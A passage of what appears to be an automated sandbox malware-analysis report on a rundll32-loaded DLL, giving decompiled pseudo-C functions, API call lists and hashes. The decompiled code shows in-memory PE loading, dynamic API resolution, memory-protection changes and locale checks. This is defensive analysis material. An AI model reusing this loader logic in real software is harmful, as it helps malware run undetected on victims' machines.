                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: ProtectVirtual$ErrorLast
                    • String ID:
                    • API String ID: 1469625949-0
                    • Opcode ID: cfb6d2c5ebd4110e1791511e648b1784f8327aba92cdb55bfcbf45d98cf7793c
                    • Instruction ID: e681f4ef843ec588cb0172eda39a4f5eba049f1e30e0cbedc153c2b3ccb6c813
                    • Opcode Fuzzy Hash: cfb6d2c5ebd4110e1791511e648b1784f8327aba92cdb55bfcbf45d98cf7793c
                    • Instruction Fuzzy Hash: 2F217F71A0020ADFCB14CF96C985AAAF7B4FF08354F018459D602D7119E7B6FAB4CB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 80%
                    			E6FFA1768() {
                    				char _v28;
                    				void _v44;
                    				char _v48;
                    				void* _v52;
                    				long _t23;
                    				int _t24;
                    				void* _t28;
                    				intOrPtr* _t30;
                    				signed int _t34;
                    				intOrPtr _t36;
                    
                    				_push(0);
                    				_push(0x6ffa41c4);
                    				_push(1);
                    				_push( *0x6ffa41d0 + 0x6ffa5089);
                    				 *0x6ffa41c0 = 0xc;
                    				 *0x6ffa41c8 = 0; // executed
                    				L6FFA1B44(); // executed
                    				_t34 = 6;
                    				memset( &_v44, 0, _t34 << 2);
                    				if(E6FFA1823( &_v44,  &_v28,  *0x6ffa41cc ^ 0xf7a71548) == 0) {
                    					_t23 = 0xb;
                    					L7:
                    					ExitThread(_t23);
                    				}
                    				_t24 = lstrlenW( *0x6ffa41b8);
                    				_t7 = _t24 + 2; // 0x2
                    				_t10 = _t24 + _t7 + 8; // 0xa
                    				_t28 = E6FFA10ED(_t36, _t10,  &_v48,  &_v52); // executed
                    				if(_t28 == 0) {
                    					_t30 = _v52;
                    					 *_t30 = 0;
                    					if( *0x6ffa41b8 == 0) {
                    						 *((short*)(_t30 + 4)) = 0;
                    					} else {
                    						E6FFA212A(_t40, _t30 + 4);
                    					}
                    				}
                    				_t23 = E6FFA1202(_v44); // executed
                    				goto L7;
                    			}

                    APIs
                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6FFA41C4,00000000), ref: 6FFA1799
                    • lstrlenW.KERNEL32(?,?,?), ref: 6FFA17CD
                      • Part of subcall function 6FFA10ED: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6FFA17EA,0000000A,?,?), ref: 6FFA10FA
                      • Part of subcall function 6FFA10ED: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6FFA1110
                      • Part of subcall function 6FFA10ED: _snwprintf.NTDLL ref: 6FFA1135
                      • Part of subcall function 6FFA10ED: CreateFileMappingW.KERNELBASE(000000FF,6FFA41C0,00000004,00000000,?,?), ref: 6FFA115A
                      • Part of subcall function 6FFA10ED: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6FFA17EA,0000000A,?), ref: 6FFA1171
                      • Part of subcall function 6FFA10ED: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6FFA17EA,0000000A), ref: 6FFA11A6
                    • ExitThread.KERNEL32 ref: 6FFA181C
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                    • String ID:
                    • API String ID: 4209869662-0
                    • Opcode ID: 40c273f6cccbe6e4c30b4ad415961502ae60054672a3cc50f47e407a24610408
                    • Instruction ID: ba2e23155f3044b941b6722e076eb26e23888a85ab95edd2a1b30d38a75a6203
                    • Opcode Fuzzy Hash: 40c273f6cccbe6e4c30b4ad415961502ae60054672a3cc50f47e407a24610408
                    • Instruction Fuzzy Hash: B2119D72114705EBDB02CBA4C844E8B77ECFF45718F024A16F514D71B0EB32E5258B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 83%
                    			E6FFA195C(void* __ecx) {
                    				void* _v8;
                    				char _v12;
                    				char* _t18;
                    				char* _t25;
                    				char* _t29;
                    
                    				_t22 = __ecx;
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t25 = 0;
                    				if(E6FFA1823( &_v8,  &_v12,  *0x6ffa41cc ^ 0x13b675ce) != 0) {
                    					if(_v8 == 0) {
                    						_t29 = 0;
                    					} else {
                    						_t29 = E6FFA1CE6(_t22, _v8,  *0x6ffa41cc ^ 0x64927f78);
                    					}
                    					if(_t29 != 0) {
                    						_v12 = E6FFA11BF(_t22) & 0x0000ffff;
                    						_t18 = StrStrIA(_t29,  &_v12); // executed
                    						if(_t18 != 0) {
                    							_t25 = 0x657;
                    						}
                    					}
                    					HeapFree( *0x6ffa4190, 0, _v8);
                    				}
                    				return _t25;
                    			}

                    APIs
                    • StrStrIA.KERNELBASE(00000000,6FFA1576,?,6FFA1576,?,00000000,00000001,?,?,?,6FFA1576), ref: 6FFA19B3
                    • HeapFree.KERNEL32(00000000,?,?,6FFA1576,?,00000000,00000001,?,?,?,6FFA1576), ref: 6FFA19CD
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: 0cc056e2f427b0f07676d74c4b0a1950607073afe7587e5dd3d5b5b582255024
                    • Instruction ID: ebecf059f9f4a8fbc4aed600558ceb286cbac88e68404b638a45fc0752f40090
                    • Opcode Fuzzy Hash: 0cc056e2f427b0f07676d74c4b0a1950607073afe7587e5dd3d5b5b582255024
                    • Instruction Fuzzy Hash: 6601A776A10514FBCB02DFE1CD41EEF7BBDEF49614F110162A940E7150EA32DA11CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                      • Part of subcall function 70007341: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 70007382
                    • _free.LIBCMT ref: 70012C1C
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: fead79109f577deddf8a53b2cc60840e495838c99c5678c3529969ae27bebc1b
                    • Instruction ID: 01e20f841c9e04464adfce6f7e35b71ec3d9e2d41086ca7dfdcb3ea9ab1f951f
                    • Opcode Fuzzy Hash: fead79109f577deddf8a53b2cc60840e495838c99c5678c3529969ae27bebc1b
                    • Instruction Fuzzy Hash: D0012672604356AFD321CFA8C88598EFBA9EB047B0F110629E545A76C0E7706C60CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 483 70007341-7000734c 484 7000735a-70007360 483->484 485 7000734e-70007358 483->485 487 70007362-70007363 484->487 488 70007379-7000738a RtlAllocateHeap 484->488 485->484 486 7000738e-70007399 call 70006ddb 485->486 492 7000739b-7000739d 486->492 487->488 489 70007365-7000736c call 7000a696 488->489 490 7000738c 488->490 489->486 496 7000736e-70007377 call 70007d94 489->496 490->492 496->486 496->488
                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 70007382
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: 83ae4360da9de4c45a5372c3d4d21f61860616477a54fd77e35a3774930ba702
                    • Instruction ID: f4c1256cff3dfffd2646add9926f72ff9ef73e0d1a68f64f008ebb8cd14b0c2c
                    • Opcode Fuzzy Hash: 83ae4360da9de4c45a5372c3d4d21f61860616477a54fd77e35a3774930ba702
                    • Instruction Fuzzy Hash: 7AF0BB32E447286AF721DA268D0DB7E37AAAF41E70B258115FC0ED6144CB78ED00A6A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E6FFA1202(void* __eax) {
                    				char _v8;
                    				void* _v12;
                    				void* __edi;
                    				void* _t18;
                    				long _t24;
                    				long _t26;
                    				long _t29;
                    				intOrPtr _t40;
                    				void* _t41;
                    				intOrPtr* _t42;
                    				void* _t44;
                    
                    				_t41 = __eax;
                    				_t16 =  *0x6ffa41cc;
                    				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6ffa41cc - 0x69b24f45 &  !( *0x6ffa41cc - 0x69b24f45);
                    				_t18 = E6FFA1E91( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6ffa41cc - 0x69b24f45 &  !( *0x6ffa41cc - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6ffa41cc - 0x69b24f45 &  !( *0x6ffa41cc - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
                    				if(_t18 != 0) {
                    					_t29 = 8;
                    					goto L8;
                    				} else {
                    					_t40 = _v8;
                    					_t29 = E6FFA16E7(_t33, _t40, _t41);
                    					if(_t29 == 0) {
                    						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                    						_t24 = E6FFA1A0A(_t40, _t44); // executed
                    						_t29 = _t24;
                    						if(_t29 == 0) {
                    							_t26 = E6FFA2042(_t44, _t40); // executed
                    							_t29 = _t26;
                    							if(_t29 == 0) {
                    								_push(_t26);
                    								_push(1);
                    								_push(_t40);
                    								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                    									_t29 = GetLastError();
                    								}
                    							}
                    						}
                    					}
                    					_t42 = _v12;
                    					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                    					E6FFA1E7C(_t42);
                    					L8:
                    					return _t29;
                    				}
                    			}
                    0x6ffa120a
                    0x6ffa120c
                    0x6ffa1228
                    0x6ffa1239
                    0x6ffa1240
                    0x6ffa129e
                    0x00000000
                    0x6ffa1242
                    0x6ffa1242
                    0x6ffa124c
                    0x6ffa1250
                    0x6ffa1255
                    0x6ffa1258
                    0x6ffa125d
                    0x6ffa1261
                    0x6ffa1266
                    0x6ffa126b
                    0x6ffa126f
                    0x6ffa1274
                    0x6ffa1275
                    0x6ffa1279
                    0x6ffa127e
                    0x6ffa1286
                    0x6ffa1286
                    0x6ffa127e
                    0x6ffa126f
                    0x6ffa1261
                    0x6ffa1288
                    0x6ffa1291
                    0x6ffa1295
                    0x6ffa129f
                    0x6ffa12a5
                    0x6ffa12a5

                    APIs
                      • Part of subcall function 6FFA1E91: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6FFA123E,?,?,?,?,00000002,00000000,?,?), ref: 6FFA1EB5
                      • Part of subcall function 6FFA1E91: GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1ED7
                      • Part of subcall function 6FFA1E91: GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1EED
                      • Part of subcall function 6FFA1E91: GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1F03
                      • Part of subcall function 6FFA1E91: GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1F19
                      • Part of subcall function 6FFA1E91: GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1F2F
                      • Part of subcall function 6FFA16E7: memcpy.NTDLL(00000000,00000002,6FFA124C,?,?,?,?,?,6FFA124C,?,?,?,?,?,?,00000002), ref: 6FFA1714
                      • Part of subcall function 6FFA16E7: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 6FFA1747
                      • Part of subcall function 6FFA1A0A: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6FFA1A42
                      • Part of subcall function 6FFA2042: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6FFA207B
                      • Part of subcall function 6FFA2042: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6FFA20F0
                      • Part of subcall function 6FFA2042: GetLastError.KERNEL32 ref: 6FFA20F6
                    • GetLastError.KERNEL32(?,?), ref: 6FFA1280
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                    • String ID:
                    • API String ID: 2673762927-0
                    • Opcode ID: 24c1575d3204ea293ead73cd038b4b82e7089870eff406b62c4f79eef0a23b88
                    • Instruction ID: 196eb2df3c12afac84ea10ad2f8a8968730fc1fcb940841399367dd2ddfa3a12
                    • Opcode Fuzzy Hash: 24c1575d3204ea293ead73cd038b4b82e7089870eff406b62c4f79eef0a23b88
                    • Instruction Fuzzy Hash: ED11EE36600711EBD7119BE9CC80D9F77FCAF893187054659EA01D7644EBA2FD058B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLocaleInfoW.KERNEL32(?,2000000B,7001266D,00000002,00000000,?,?,?,7001266D,?,00000000), ref: 700123E8
                    • GetLocaleInfoW.KERNEL32(?,20001004,7001266D,00000002,00000000,?,?,?,7001266D,?,00000000), ref: 70012411
                    • GetACP.KERNEL32(?,?,7001266D,?,00000000), ref: 70012426
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP
                    • API String ID: 2299586839-711371036
                    • Opcode ID: 222cf211ab6e4f59172543003c9ad823cb35cebb1cd6767bca9e3f833151cc7d
                    • Instruction ID: 1ea6d55796e5fd4c9110b8ff33f99f9e85545a53e33833e974d3fe8613c80660
                    • Opcode Fuzzy Hash: 222cf211ab6e4f59172543003c9ad823cb35cebb1cd6767bca9e3f833151cc7d
                    • Instruction Fuzzy Hash: A4218C22600102EBEB268F75C905B8F72F7AB45E74B628528E90BD7214E732DEE1C750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 700096C6: GetLastError.KERNEL32(00000000,?,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 700096CB
                      • Part of subcall function 700096C6: SetLastError.KERNEL32(00000000,700471A0,000000FF,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 70009769
                    • GetACP.KERNEL32(?,?,?,?,?,?,7000AE13,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 70011C84
                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7000AE13,?,?,?,00000055,?,-00000050,?,?), ref: 70011CAF
                    • _wcschr.LIBVCRUNTIME ref: 70011D43
                    • _wcschr.LIBVCRUNTIME ref: 70011D51
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 70011E12
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                    • String ID:
                    • API String ID: 4147378913-0
                    • Opcode ID: 24d8ab03308cab575913fa02e30d44572347ae21d9f5548f19c45d098f8244f8
                    • Instruction ID: 68fc3afeff8be51856747fc2f34452e622bd9ac055b3706cb17d0a6e750917dc
                    • Opcode Fuzzy Hash: 24d8ab03308cab575913fa02e30d44572347ae21d9f5548f19c45d098f8244f8
                    • Instruction Fuzzy Hash: CE71B371A40603AEE7199B75DC46BEE73FAEF45F30F104529F9069B281FB70E9808691
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 700096C6: GetLastError.KERNEL32(00000000,?,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 700096CB
                      • Part of subcall function 700096C6: SetLastError.KERNEL32(00000000,700471A0,000000FF,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 70009769
                      • Part of subcall function 700096C6: _free.LIBCMT ref: 70009728
                      • Part of subcall function 700096C6: _free.LIBCMT ref: 7000975E
                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 70012630
                    • IsValidCodePage.KERNEL32(00000000), ref: 70012679
                    • IsValidLocale.KERNEL32(?,00000001), ref: 70012688
                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 700126D0
                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 700126EF
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                    • String ID:
                    • API String ID: 949163717-0
                    • Opcode ID: 0001fb0407ca36f4ad270574a8e62b6cf9586a7db2445356f2adae6ff00dc05d
                    • Instruction ID: d8fe3ed3063dd71dfd38ffa76e50a5891f5f63c61dbc82f482b95d0710331d48
                    • Opcode Fuzzy Hash: 0001fb0407ca36f4ad270574a8e62b6cf9586a7db2445356f2adae6ff00dc05d
                    • Instruction Fuzzy Hash: 2F516172900207EFEB01DFB5CC45AAE77FABF44B20F104569F906E7191EB70A9908B61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E6FFA1F7C() {
                    				void* _t1;
                    				long _t3;
                    				void* _t4;
                    				long _t5;
                    				void* _t6;
                    				intOrPtr _t8;
                    
                    				_t8 =  *0x6ffa41b0;
                    				_t1 = CreateEventA(0, 1, 0, 0);
                    				 *0x6ffa41bc = _t1;
                    				if(_t1 == 0) {
                    					return GetLastError();
                    				}
                    				_t3 = GetVersion();
                    				if(_t3 <= 5) {
                    					_t4 = 0x32;
                    					return _t4;
                    				} else {
                    					 *0x6ffa41ac = _t3;
                    					_t5 = GetCurrentProcessId();
                    					 *0x6ffa41a8 = _t5;
                    					 *0x6ffa41b0 = _t8;
                    					_t6 = OpenProcess(0x10047a, 0, _t5);
                    					 *0x6ffa41a4 = _t6;
                    					if(_t6 == 0) {
                    						 *0x6ffa41a4 =  *0x6ffa41a4 | 0xffffffff;
                    					}
                    					return 0;
                    				}
                    			}

                    0x6ffa1f7d
                    0x6ffa1f8b
                    0x6ffa1f93
                    0x6ffa1f98
                    0x6ffa1fe2
                    0x6ffa1fe2
                    0x6ffa1f9a
                    0x6ffa1fa2
                    0x6ffa1fde
                    0x6ffa1fe0
                    0x6ffa1fa4
                    0x6ffa1fa4
                    0x6ffa1fa9
                    0x6ffa1fb7
                    0x6ffa1fbc
                    0x6ffa1fc2
                    0x6ffa1fca
                    0x6ffa1fcf
                    0x6ffa1fd1
                    0x6ffa1fd1
                    0x6ffa1fdb
                    0x6ffa1fdb

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6FFA1512,747863F0,00000000), ref: 6FFA1F8B
                    • GetVersion.KERNEL32 ref: 6FFA1F9A
                    • GetCurrentProcessId.KERNEL32 ref: 6FFA1FA9
                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6FFA1FC2
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: Process$CreateCurrentEventOpenVersion
                    • String ID:
                    • API String ID: 845504543-0
                    • Opcode ID: f75383ad0ee4cad4f2c28c62a0fb2aa7927655e13a88a3290d7e2395cd125f6b
                    • Instruction ID: 9904a9461af0e5c581acab54cfc04e3312f40dc2846576eb079fb72cdc79beec
                    • Opcode Fuzzy Hash: f75383ad0ee4cad4f2c28c62a0fb2aa7927655e13a88a3290d7e2395cd125f6b
                    • Instruction Fuzzy Hash: 0CF06D30674A10EEEF528F79A80674E3BA4BB06735F11802AE104C91F0DB7160628F54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,70001F57,7003A428,00000017), ref: 70001E3D
                    • UnhandledExceptionFilter.KERNEL32(7003A428,?,70001F57,7003A428,00000017), ref: 70001E46
                    • GetCurrentProcess.KERNEL32(C0000409,?,70001F57,7003A428,00000017), ref: 70001E51
                    • TerminateProcess.KERNEL32(00000000,?,70001F57,7003A428,00000017), ref: 70001E58
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                    • String ID:
                    • API String ID: 3231755760-0
                    • Opcode ID: a8d69f8530dd941252ee70cb9a2aef17590eb87818fd953dc124a397627950a7
                    • Instruction ID: 25ded8572a309eea30834ec77e24b681c411e02256230d880852ca5679be4ed3
                    • Opcode Fuzzy Hash: a8d69f8530dd941252ee70cb9a2aef17590eb87818fd953dc124a397627950a7
                    • Instruction Fuzzy Hash: 4BD0C973044208BFE7006BEACC0CB4E3A38AB04222F108000F70D83221CAB158008B51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 700067FF
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 70006809
                    • UnhandledExceptionFilter.KERNEL32(6FFFC512), ref: 70006816
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: e4fc9918fa1b4a93b33fafc0f6919f825b30ec5566b7add03a4b0523e13ce428
                    • Instruction ID: 26ac8e7fc63e71e0e8db6d039e6cf2442a65972a4a83329f1bb3cf0833ede474
                    • Opcode Fuzzy Hash: e4fc9918fa1b4a93b33fafc0f6919f825b30ec5566b7add03a4b0523e13ce428
                    • Instruction Fuzzy Hash: 1331C575901228AFDB21DF68DD8978DBBB9BF08720F5041EAE40DA7251EB709F818F45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E6FFA11BF(void* __ecx) {
                    				char _v8;
                    				signed short _t7;
                    
                    				_v8 = _v8 & 0x00000000;
                    				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
                    				if(_t7 == 0) {
                    					__imp__GetSystemDefaultUILanguage();
                    					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                    				}
                    				return _v8;
                    			}
                    0x6ffa11c3
                    0x6ffa11d4
                    0x6ffa11dc
                    0x6ffa11de
                    0x6ffa11f1
                    0x6ffa11f1
                    0x6ffa11fb

                    APIs
                    • GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,6FFA19A8,?,6FFA1576,?,00000000,00000001,?,?,?,6FFA1576), ref: 6FFA11D4
                    • GetSystemDefaultUILanguage.KERNEL32(?,?,6FFA19A8,?,6FFA1576,?,00000000,00000001,?,?,?,6FFA1576), ref: 6FFA11DE
                    • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6FFA19A8,?,6FFA1576,?,00000000,00000001,?,?,?,6FFA1576), ref: 6FFA11F1
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmp
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: Language$DefaultInfoLocaleNameSystem
                    • String ID:
                    • API String ID: 3724080410-0
                    • Opcode ID: b6f013ad36564c74b4e225b97c1a2090636234b599bb3a346d0551b09d3418e6
                    • Instruction ID: eb50012319d66fe7e054bfc2fa353ec0cd29dd6aff7ca0ed5f51734f967a0a9d
                    • Opcode Fuzzy Hash: b6f013ad36564c74b4e225b97c1a2090636234b599bb3a346d0551b09d3418e6
                    • Instruction Fuzzy Hash: D2E04F74650248F6EB00D7A18D07FBE72BCAB0175AF500045FB01E61D0D6B59E14EB39
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,700081A5,70045B10,?,?,70045B10,?,7000053E), ref: 700081C8
                    • TerminateProcess.KERNEL32(00000000,?,700081A5,70045B10,?,?,70045B10,?,7000053E), ref: 700081CF
                    • ExitProcess.KERNEL32 ref: 700081E1
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 0b7d99e23d04daa5390f84ae4619fd1ae1f8ed92d482cb271a533715872201d5
                    • Instruction ID: 5dbc7719206ec216fef743e7f18790514eada7b86c94fe8d43dd5fd028c62111
                    • Opcode Fuzzy Hash: 0b7d99e23d04daa5390f84ae4619fd1ae1f8ed92d482cb271a533715872201d5
                    • Instruction Fuzzy Hash: 63E0B632000648BFEB02AF59CC0DA8E3B7AFF40A71B108414F94A87231CB75ED82CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,7000CA45,?,?,?,?,?,?,00000000), ref: 7000CC77
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
